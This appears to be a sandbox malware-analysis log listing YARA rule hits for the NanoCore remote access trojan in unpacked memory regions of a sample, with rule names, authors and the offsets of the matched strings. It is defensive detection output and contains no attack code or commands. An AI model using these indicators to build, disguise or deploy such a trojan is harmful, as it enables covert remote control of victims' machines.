5.2.nD2ozRD7MN.exe.78c0000.23.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x5b70:$x2: NanoCore.ClientPlugin 0x5b99:$x3: NanoCore.ClientPluginHost 0x5b61:$i3: IClientNetwork 0x5b86:$i6: IClientLoggingHost 0x5bb3:$i7: IClientNetworkHost 0x59d4:$s1: ClientPlugin 0x5b79:$s1: ClientPlugin 0x5e84:$s2: EndPoint 0x5e8d:$s3: IPAddress 0x5e97:$s4: IPEndPoint
12.2.nD2ozRD7MN.exe.2c9a258.1.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0xe75:$a1: NanoCore.ClientPluginHost 0xe38:$a2: NanoCore.ClientPlugin 0x120c:$b1: get_BuilderSettings 0xec3:$b4: IClientAppHost 0x127d:$b6: AddHostEntry 0x12ec:$b7: LogClientException 0x1261:$b8: PipeExists 0xeb0:$b9: IClientLoggingHost
12.2.nD2ozRD7MN.exe.2c9a258.1.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
12.2.nD2ozRD7MN.exe.2c9a258.1.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xe38:$x2: NanoCore.ClientPlugin 0xe75:$x3: NanoCore.ClientPluginHost 0xe5a:$i1: IClientApp 0xe4e:$i2: IClientData 0xe29:$i3: IClientNetwork 0xec3:$i4: IClientAppHost 0xe65:$i5: IClientDataHost 0xeb0:$i6: IClientLoggingHost 0xe8f:$i7: IClientNetworkHost 0xea2:$i8: IClientUIHost 0xed2:$i9: IClientNameObjectCollection 0xef7:$i10: IClientReadOnlyNameObjectCollection 0xe41:$s1: ClientPlugin 0x177c:$s1: ClientPlugin 0x1789:$s1: ClientPlugin 0x11f9:$s6: get_ClientSettings 0x1249:$s7: get_Connected
5.2.nD2ozRD7MN.exe.76d0000.15.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x4bbb:$a1: NanoCore.ClientPluginHost 0x4b96:$a2: NanoCore.ClientPlugin 0x8558:$b1: get_BuilderSettings 0x4bac:$b4: IClientAppHost
5.2.nD2ozRD7MN.exe.76d0000.15.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x4bbb:$x1: NanoCore.ClientPluginHost 0x4be5:$x2: IClientNetworkHost
5.2.nD2ozRD7MN.exe.76d0000.15.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x4b96:$x2: NanoCore.ClientPlugin 0x4bbb:$x3: NanoCore.ClientPluginHost 0x4b87:$i3: IClientNetwork 0x4bac:$i4: IClientAppHost 0x4bd5:$i5: IClientDataHost 0x4be5:$i7: IClientNetworkHost 0x4bf8:$i9: IClientNameObjectCollection 0x4c1d:$i10: IClientReadOnlyNameObjectCollection 0x49ce:$s1: ClientPlugin 0x4b9f:$s1: ClientPlugin
5.2.nD2ozRD7MN.exe.7880000.20.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x605:$a1: NanoCore.ClientPluginHost 0x67f:$a2: NanoCore.ClientPlugin 0xda0:$b7: LogClientException 0x61f:$b9: IClientLoggingHost
5.2.nD2ozRD7MN.exe.7880000.20.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x605:$x1: NanoCore.ClientPluginHost 0x63e:$x2: IClientNetworkHost
5.2.nD2ozRD7MN.exe.7880000.20.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x67f:$x2: NanoCore.ClientPlugin 0x605:$x3: NanoCore.ClientPluginHost 0x695:$i3: IClientNetwork 0x61f:$i6: IClientLoggingHost 0x63e:$i7: IClientNetworkHost 0x688:$s1: ClientPlugin
12.2.nD2ozRD7MN.exe.400000.0.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
12.2.nD2ozRD7MN.exe.400000.0.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x1018d:$a1: NanoCore.ClientPluginHost 0x1014d:$a2: NanoCore.ClientPlugin 0x120a6:$b1: get_BuilderSettings 0xffa9:$b2: ClientLoaderForm.resources 0x117c6:$b3: PluginCommand 0x1017e:$b4: IClientAppHost 0x1a5fe:$b5: GetBlockHash 0x126fe:$b6: AddHostEntry 0x163f1:$b7: LogClientException 0x1266b:$b8: PipeExists 0x101b7:$b9: IClientLoggingHost
12.2.nD2ozRD7MN.exe.400000.0.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
12.2.nD2ozRD7MN.exe.400000.0.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
5.2.nD2ozRD7MN.exe.5cd0000.13.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
5.2.nD2ozRD7MN.exe.5cd0000.13.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0xf7ad:$a1: NanoCore.ClientPluginHost 0xf778:$a2: NanoCore.ClientPlugin 0x146f3:$b1: get_BuilderSettings 0x14662:$b7: LogClientException 0xf7c7:$b9: IClientLoggingHost
12.2.nD2ozRD7MN.exe.400000.0.unpack	Nanocore	detect Nanocore in memory	JPCERT/CC Incident Response Group	0xfef5:$v1: NanoCore Client 0xff05:$v1: NanoCore Client 0x117c6:$v2: PluginCommand 0x117ae:$v3: CommandType
5.2.nD2ozRD7MN.exe.5cd0000.13.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost
12.2.nD2ozRD7MN.exe.400000.0.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xfef5:$x1: NanoCore Client 0xff05:$x1: NanoCore Client 0x1014d:$x2: NanoCore.ClientPlugin 0x1018d:$x3: NanoCore.ClientPluginHost 0x10142:$i1: IClientApp 0x10163:$i2: IClientData 0x1016f:$i3: IClientNetwork 0x1017e:$i4: IClientAppHost 0x101a7:$i5: IClientDataHost 0x101b7:$i6: IClientLoggingHost 0x101ca:$i7: IClientNetworkHost 0x101dd:$i8: IClientUIHost 0x101eb:$i9: IClientNameObjectCollection 0x10207:$i10: IClientReadOnlyNameObjectCollection 0xff54:$s1: ClientPlugin 0x10156:$s1: ClientPlugin 0x1064a:$s2: EndPoint 0x10653:$s3: IPAddress 0x1065d:$s4: IPEndPoint 0x12093:$s6: get_ClientSettings 0x12637:$s7: get_Connected
5.2.nD2ozRD7MN.exe.5cd0000.13.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xf778:$x2: NanoCore.ClientPlugin 0xf7ad:$x3: NanoCore.ClientPluginHost 0xf76c:$i2: IClientData 0xf78e:$i3: IClientNetwork 0xf79d:$i5: IClientDataHost 0xf7c7:$i6: IClientLoggingHost 0xf7da:$i7: IClientNetworkHost 0xf7ed:$i8: IClientUIHost 0xf7fb:$i9: IClientNameObjectCollection 0xf817:$i10: IClientReadOnlyNameObjectCollection 0xf56a:$s1: ClientPlugin 0xf781:$s1: ClientPlugin 0x147a2:$s6: get_ClientSettings
5.2.nD2ozRD7MN.exe.7850000.17.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x16e3:$a1: NanoCore.ClientPluginHost 0x175f:$a2: NanoCore.ClientPlugin 0x16fd:$b9: IClientLoggingHost
5.2.nD2ozRD7MN.exe.7850000.17.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x16e3:$x1: NanoCore.ClientPluginHost 0x171c:$x2: IClientNetworkHost
5.2.nD2ozRD7MN.exe.7850000.17.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x175f:$x2: NanoCore.ClientPlugin 0x16e3:$x3: NanoCore.ClientPluginHost 0x1775:$i3: IClientNetwork 0x16fd:$i6: IClientLoggingHost 0x171c:$i7: IClientNetworkHost 0x1491:$s1: ClientPlugin 0x1768:$s1: ClientPlugin
5.2.nD2ozRD7MN.exe.474e28e.7.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x350b:$a1: NanoCore.ClientPluginHost 0x2840f:$a1: NanoCore.ClientPluginHost 0x3784f:$a1: NanoCore.ClientPluginHost 0x34e2:$a2: NanoCore.ClientPlugin 0x283e6:$a2: NanoCore.ClientPlugin 0x3782a:$a2: NanoCore.ClientPlugin 0x37840:$b4: IClientAppHost 0x5854:$b7: LogClientException 0x2d43a:$b7: LogClientException 0x3bd2f:$b7: LogClientException 0x34f8:$b9: IClientLoggingHost 0x283fc:$b9: IClientLoggingHost 0x37879:$b9: IClientLoggingHost
5.2.nD2ozRD7MN.exe.474e28e.7.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x350b:$x1: NanoCore.ClientPluginHost 0x2840f:$x1: NanoCore.ClientPluginHost 0x3784f:$x1: NanoCore.ClientPluginHost 0x3525:$x2: IClientNetworkHost 0x28429:$x2: IClientNetworkHost 0x3788c:$x2: IClientNetworkHost
5.2.nD2ozRD7MN.exe.474e28e.7.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x34e2:$x2: NanoCore.ClientPlugin 0x283e6:$x2: NanoCore.ClientPlugin 0x3782a:$x2: NanoCore.ClientPlugin 0x350b:$x3: NanoCore.ClientPluginHost 0x2840f:$x3: NanoCore.ClientPluginHost 0x3784f:$x3: NanoCore.ClientPluginHost 0x34d3:$i3: IClientNetwork 0x283d7:$i3: IClientNetwork 0x3781b:$i3: IClientNetwork 0x37840:$i4: IClientAppHost 0x37869:$i5: IClientDataHost 0x34f8:$i6: IClientLoggingHost 0x283fc:$i6: IClientLoggingHost 0x37879:$i6: IClientLoggingHost 0x3525:$i7: IClientNetworkHost 0x28429:$i7: IClientNetworkHost 0x3788c:$i7: IClientNetworkHost 0x2843c:$i8: IClientUIHost 0x3789f:$i8: IClientUIHost 0x378ad:$i9: IClientNameObjectCollection 0x334e:$s1: ClientPlugin
17.2.dnshost.exe.2dfa2d4.0.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0xe75:$a1: NanoCore.ClientPluginHost 0xe38:$a2: NanoCore.ClientPlugin 0x120c:$b1: get_BuilderSettings 0xec3:$b4: IClientAppHost 0x127d:$b6: AddHostEntry 0x12ec:$b7: LogClientException 0x1261:$b8: PipeExists 0xeb0:$b9: IClientLoggingHost
17.2.dnshost.exe.2dfa2d4.0.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
17.2.dnshost.exe.2dfa2d4.0.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xe38:$x2: NanoCore.ClientPlugin 0xe75:$x3: NanoCore.ClientPluginHost 0xe5a:$i1: IClientApp 0xe4e:$i2: IClientData 0xe29:$i3: IClientNetwork 0xec3:$i4: IClientAppHost 0xe65:$i5: IClientDataHost 0xeb0:$i6: IClientLoggingHost 0xe8f:$i7: IClientNetworkHost 0xea2:$i8: IClientUIHost 0xed2:$i9: IClientNameObjectCollection 0xef7:$i10: IClientReadOnlyNameObjectCollection 0xe41:$s1: ClientPlugin 0x177c:$s1: ClientPlugin 0x1789:$s1: ClientPlugin 0x11f9:$s6: get_ClientSettings 0x1249:$s7: get_Connected
5.2.nD2ozRD7MN.exe.7930000.28.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x5fee:$a1: NanoCore.ClientPluginHost 0x5fc9:$a2: NanoCore.ClientPlugin 0x5fdf:$b4: IClientAppHost 0xa4ce:$b7: LogClientException 0x6018:$b9: IClientLoggingHost
5.2.nD2ozRD7MN.exe.7930000.28.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x5fee:$x1: NanoCore.ClientPluginHost 0x602b:$x2: IClientNetworkHost
5.2.nD2ozRD7MN.exe.7930000.28.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x5fc9:$x2: NanoCore.ClientPlugin 0x5fee:$x3: NanoCore.ClientPluginHost 0x5fba:$i3: IClientNetwork 0x5fdf:$i4: IClientAppHost 0x6008:$i5: IClientDataHost 0x6018:$i6: IClientLoggingHost 0x602b:$i7: IClientNetworkHost 0x603e:$i8: IClientUIHost 0x604c:$i9: IClientNameObjectCollection 0x5d70:$s1: ClientPlugin 0x5fd2:$s1: ClientPlugin
5.2.nD2ozRD7MN.exe.45e4e38.10.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x1d3db:$a1: NanoCore.ClientPluginHost 0x1d3b2:$a2: NanoCore.ClientPlugin 0x22406:$b7: LogClientException 0x1d3c8:$b9: IClientLoggingHost
5.2.nD2ozRD7MN.exe.45e4e38.10.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1d3db:$x1: NanoCore.ClientPluginHost 0x1d3f5:$x2: IClientNetworkHost
5.2.nD2ozRD7MN.exe.45e4e38.10.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x1d3b2:$x2: NanoCore.ClientPlugin 0x1d3db:$x3: NanoCore.ClientPluginHost 0x1d3a3:$i3: IClientNetwork 0x1d3c8:$i6: IClientLoggingHost 0x1d3f5:$i7: IClientNetworkHost 0x1d408:$i8: IClientUIHost 0x1d112:$s1: ClientPlugin 0x1d3bb:$s1: ClientPlugin
5.2.nD2ozRD7MN.exe.3435bc4.1.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x2dbb:$a1: NanoCore.ClientPluginHost 0x2d96:$a2: NanoCore.ClientPlugin 0x6758:$b1: get_BuilderSettings 0x2dac:$b4: IClientAppHost
5.2.nD2ozRD7MN.exe.3435bc4.1.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x2dbb:$x1: NanoCore.ClientPluginHost 0x2de5:$x2: IClientNetworkHost
5.2.nD2ozRD7MN.exe.3435bc4.1.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x2d96:$x2: NanoCore.ClientPlugin 0x2dbb:$x3: NanoCore.ClientPluginHost 0x2d87:$i3: IClientNetwork 0x2dac:$i4: IClientAppHost 0x2dd5:$i5: IClientDataHost 0x2de5:$i7: IClientNetworkHost 0x2df8:$i9: IClientNameObjectCollection 0x2e1d:$i10: IClientReadOnlyNameObjectCollection 0x2bce:$s1: ClientPlugin 0x2d9f:$s1: ClientPlugin
0.2.nD2ozRD7MN.exe.3f95ab0.0.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0.2.nD2ozRD7MN.exe.3f95ab0.0.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0xe38d:$a1: NanoCore.ClientPluginHost 0xe34d:$a2: NanoCore.ClientPlugin 0x102a6:$b1: get_BuilderSettings 0xe1a9:$b2: ClientLoaderForm.resources 0xf9c6:$b3: PluginCommand 0xe37e:$b4: IClientAppHost 0x187fe:$b5: GetBlockHash 0x108fe:$b6: AddHostEntry 0x145f1:$b7: LogClientException 0x1086b:$b8: PipeExists 0xe3b7:$b9: IClientLoggingHost
0.2.nD2ozRD7MN.exe.3f95ab0.0.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
0.2.nD2ozRD7MN.exe.3f95ab0.0.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0.2.nD2ozRD7MN.exe.3f95ab0.0.unpack	Nanocore	detect Nanocore in memory	JPCERT/CC Incident Response Group	0xe0f5:$v1: NanoCore Client 0xe105:$v1: NanoCore Client 0xf9c6:$v2: PluginCommand 0xf9ae:$v3: CommandType
0.2.nD2ozRD7MN.exe.3f95ab0.0.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xe0f5:$x1: NanoCore Client 0xe105:$x1: NanoCore Client 0xe34d:$x2: NanoCore.ClientPlugin 0xe38d:$x3: NanoCore.ClientPluginHost 0xe342:$i1: IClientApp 0xe363:$i2: IClientData 0xe36f:$i3: IClientNetwork 0xe37e:$i4: IClientAppHost 0xe3a7:$i5: IClientDataHost 0xe3b7:$i6: IClientLoggingHost 0xe3ca:$i7: IClientNetworkHost 0xe3dd:$i8: IClientUIHost 0xe3eb:$i9: IClientNameObjectCollection 0xe407:$i10: IClientReadOnlyNameObjectCollection 0xe154:$s1: ClientPlugin 0xe356:$s1: ClientPlugin 0xe84a:$s2: EndPoint 0xe853:$s3: IPAddress 0xe85d:$s4: IPEndPoint 0x10293:$s6: get_ClientSettings 0x10837:$s7: get_Connected
0.2.nD2ozRD7MN.exe.4a9a7a0.2.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0.2.nD2ozRD7MN.exe.4a9a7a0.2.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0xe38d:$a1: NanoCore.ClientPluginHost 0xe34d:$a2: NanoCore.ClientPlugin 0x102a6:$b1: get_BuilderSettings 0xe1a9:$b2: ClientLoaderForm.resources 0xf9c6:$b3: PluginCommand 0xe37e:$b4: IClientAppHost 0x187fe:$b5: GetBlockHash 0x108fe:$b6: AddHostEntry 0x145f1:$b7: LogClientException 0x1086b:$b8: PipeExists 0xe3b7:$b9: IClientLoggingHost
0.2.nD2ozRD7MN.exe.4a9a7a0.2.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
0.2.nD2ozRD7MN.exe.4a9a7a0.2.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0.2.nD2ozRD7MN.exe.4a9a7a0.2.unpack	Nanocore	detect Nanocore in memory	JPCERT/CC Incident Response Group	0xe0f5:$v1: NanoCore Client 0xe105:$v1: NanoCore Client 0xf9c6:$v2: PluginCommand 0xf9ae:$v3: CommandType
0.2.nD2ozRD7MN.exe.4a9a7a0.2.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xe0f5:$x1: NanoCore Client 0xe105:$x1: NanoCore Client 0xe34d:$x2: NanoCore.ClientPlugin 0xe38d:$x3: NanoCore.ClientPluginHost 0xe342:$i1: IClientApp 0xe363:$i2: IClientData 0xe36f:$i3: IClientNetwork 0xe37e:$i4: IClientAppHost 0xe3a7:$i5: IClientDataHost 0xe3b7:$i6: IClientLoggingHost 0xe3ca:$i7: IClientNetworkHost 0xe3dd:$i8: IClientUIHost 0xe3eb:$i9: IClientNameObjectCollection 0xe407:$i10: IClientReadOnlyNameObjectCollection 0xe154:$s1: ClientPlugin 0xe356:$s1: ClientPlugin 0xe84a:$s2: EndPoint 0xe853:$s3: IPAddress 0xe85d:$s4: IPEndPoint 0x10293:$s6: get_ClientSettings 0x10837:$s7: get_Connected
0.2.nD2ozRD7MN.exe.3f95ab0.0.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0.2.nD2ozRD7MN.exe.3f95ab0.0.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x1018d:$a1: NanoCore.ClientPluginHost 0x1014d:$a2: NanoCore.ClientPlugin 0x120a6:$b1: get_BuilderSettings 0xffa9:$b2: ClientLoaderForm.resources 0x117c6:$b3: PluginCommand 0x1017e:$b4: IClientAppHost 0x1a5fe:$b5: GetBlockHash 0x126fe:$b6: AddHostEntry 0x163f1:$b7: LogClientException 0x1266b:$b8: PipeExists 0x101b7:$b9: IClientLoggingHost
0.2.nD2ozRD7MN.exe.3f95ab0.0.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
0.2.nD2ozRD7MN.exe.3f95ab0.0.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0.2.nD2ozRD7MN.exe.3f95ab0.0.raw.unpack	Nanocore	detect Nanocore in memory	JPCERT/CC Incident Response Group	0xfef5:$v1: NanoCore Client 0xff05:$v1: NanoCore Client 0x117c6:$v2: PluginCommand 0x117ae:$v3: CommandType
0.2.nD2ozRD7MN.exe.3f95ab0.0.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xfef5:$x1: NanoCore Client 0xff05:$x1: NanoCore Client 0x1014d:$x2: NanoCore.ClientPlugin 0x1018d:$x3: NanoCore.ClientPluginHost 0x10142:$i1: IClientApp 0x10163:$i2: IClientData 0x1016f:$i3: IClientNetwork 0x1017e:$i4: IClientAppHost 0x101a7:$i5: IClientDataHost 0x101b7:$i6: IClientLoggingHost 0x101ca:$i7: IClientNetworkHost 0x101dd:$i8: IClientUIHost 0x101eb:$i9: IClientNameObjectCollection 0x10207:$i10: IClientReadOnlyNameObjectCollection 0xff54:$s1: ClientPlugin 0x10156:$s1: ClientPlugin 0x1064a:$s2: EndPoint 0x10653:$s3: IPAddress 0x1065d:$s4: IPEndPoint 0x12093:$s6: get_ClientSettings 0x12637:$s7: get_Connected
5.2.nD2ozRD7MN.exe.76d0000.15.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x2dbb:$a1: NanoCore.ClientPluginHost 0x2d96:$a2: NanoCore.ClientPlugin 0x6758:$b1: get_BuilderSettings 0x2dac:$b4: IClientAppHost
5.2.nD2ozRD7MN.exe.473702f.9.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x1deb:$a1: NanoCore.ClientPluginHost 0x1e8b:$a2: NanoCore.ClientPlugin 0x2be1:$b7: LogClientException 0x1e05:$b9: IClientLoggingHost
5.2.nD2ozRD7MN.exe.473702f.9.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1deb:$x1: NanoCore.ClientPluginHost 0x1e24:$x2: IClientNetworkHost
5.2.nD2ozRD7MN.exe.76d0000.15.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x2dbb:$x1: NanoCore.ClientPluginHost 0x2de5:$x2: IClientNetworkHost
5.2.nD2ozRD7MN.exe.76d0000.15.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x2d96:$x2: NanoCore.ClientPlugin 0x2dbb:$x3: NanoCore.ClientPluginHost 0x2d87:$i3: IClientNetwork 0x2dac:$i4: IClientAppHost 0x2dd5:$i5: IClientDataHost 0x2de5:$i7: IClientNetworkHost 0x2df8:$i9: IClientNameObjectCollection 0x2e1d:$i10: IClientReadOnlyNameObjectCollection 0x2bce:$s1: ClientPlugin 0x2d9f:$s1: ClientPlugin
5.2.nD2ozRD7MN.exe.473702f.9.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x1e8b:$x2: NanoCore.ClientPlugin 0x1deb:$x3: NanoCore.ClientPluginHost 0x1ea1:$i3: IClientNetwork 0x1e43:$i5: IClientDataHost 0x1e05:$i6: IClientLoggingHost 0x1e24:$i7: IClientNetworkHost 0x266c:$i9: IClientNameObjectCollection 0x1b41:$s1: ClientPlugin 0x1e94:$s1: ClientPlugin 0x2a80:$s2: EndPoint 0x2771:$s3: IPAddress 0x2083:$s4: IPEndPoint 0x27a3:$s7: get_Connected
5.2.nD2ozRD7MN.exe.78f0000.24.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0x170b:$a1: NanoCore.ClientPluginHost 0x16e2:$a2: NanoCore.ClientPlugin 0x3a54:$b7: LogClientException 0x16f8:$b9: IClientLoggingHost
5.2.nD2ozRD7MN.exe.78f0000.24.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x170b:$x1: NanoCore.ClientPluginHost 0x1725:$x2: IClientNetworkHost
5.2.nD2ozRD7MN.exe.78f0000.24.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0x16e2:$x2: NanoCore.ClientPlugin 0x170b:$x3: NanoCore.ClientPluginHost 0x16d3:$i3: IClientNetwork 0x16f8:$i6: IClientLoggingHost 0x1725:$i7: IClientNetworkHost 0x154e:$s1: ClientPlugin 0x16eb:$s1: ClientPlugin
5.2.nD2ozRD7MN.exe.5ab0000.11.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0xe75:$a1: NanoCore.ClientPluginHost 0xe38:$a2: NanoCore.ClientPlugin 0x120c:$b1: get_BuilderSettings 0xec3:$b4: IClientAppHost 0x127d:$b6: AddHostEntry 0x12ec:$b7: LogClientException 0x1261:$b8: PipeExists 0xeb0:$b9: IClientLoggingHost
5.2.nD2ozRD7MN.exe.5ab0000.11.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
5.2.nD2ozRD7MN.exe.5ab0000.11.raw.unpack	MALWARE_Win_NanoCore	Detects NanoCore	ditekSHen	0xe38:$x2: NanoCore.ClientPlugin 0xe75:$x3: NanoCore.ClientPluginHost 0xe5a:$i1: IClientApp 0xe4e:$i2: IClientData 0xe29:$i3: IClientNetwork 0xec3:$i4: IClientAppHost 0xe65:$i5: IClientDataHost 0xeb0:$i6: IClientLoggingHost 0xe8f:$i7: IClientNetworkHost 0xea2:$i8: IClientUIHost 0xed2:$i9: IClientNameObjectCollection 0xef7:$i10: IClientReadOnlyNameObjectCollection 0xe41:$s1: ClientPlugin 0x177c:$s1: ClientPlugin 0x1789:$s1: ClientPlugin 0x11f9:$s6: get_ClientSettings 0x1249:$s7: get_Connected
5.2.nD2ozRD7MN.exe.5cd4629.12.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
5.2.nD2ozRD7MN.exe.5cd4629.12.raw.unpack	Windows_Trojan_Nanocore_d8c4e3c5	unknown	unknown	0xb184:$a1: NanoCore.ClientPluginHost 0xb14f:$a2: NanoCore.ClientPlugin 0x100ca:$b1: get_BuilderSettings 0x10039:$b7: LogClientException 0xb19e:$b9: IClientLoggingHost
5.2.nD2ozRD7MN.exe.5cd4629.12.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xb184:$x1: NanoCore.ClientPluginHost 0xb1b1:$x2: IClientNetworkHost
